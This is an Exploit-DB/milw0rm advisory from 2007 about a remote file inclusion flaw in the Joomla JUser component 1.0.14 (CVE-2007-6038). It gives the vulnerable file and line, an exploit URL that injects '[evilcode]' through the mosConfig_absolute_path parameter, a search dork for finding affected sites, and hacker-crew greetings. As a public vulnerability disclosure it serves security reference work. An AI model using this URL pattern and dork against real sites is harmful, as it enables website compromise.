joomla component juser 1.0.14 - Remote File Inclusion Vulnerability

2007-11-19T00:00:00
ID EDB-ID:4636
Type exploitdb
Reporter NoGe
Modified 2007-11-19T00:00:00

Description

Joomla Component JUser 1.0.14 Remote File Inclusion Vulnerability. CVE-2007-6038. Webapps exploit for php platform

                                        
                                            ==================================================================================================================================

# JUser Joomla Component 1.0.14 Remote File Include Vulnerability

    Component     : com_juser version 1.0.14 - paid component
    Vendor        : www.joomlaequipment.com
    Discovered by : NoGe
    Contact       : pace[dot]noge[at]hotmail[dot]com
  
==================================================================================================================================

# Vulnerable file
  
    /administrator/components/com_juser/xajax_functions.php

    line 4 require ($mosConfig_absolute_path.'/administrator/components/com_juser/xajax/xajax_core/xajax.inc.php');



# Exploit

    http://localhost/path/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=[evilcode]



# D0rk

    inurl:com_juser

==================================================================================================================================

# Greetz

    all crew #papuahacker #baliemhackerlink #nyubicrew
    skulmatic OLiBekaS ulga Cungkee nyubi k1tk4t str0ke newbie
    yooogy H312Y Vrs-hCk Oon_Boy Paman mousekill }^-^{ haliq
    http://kapukvalley.net member

==================================================================================================================================

# milw0rm.com [2007-11-19]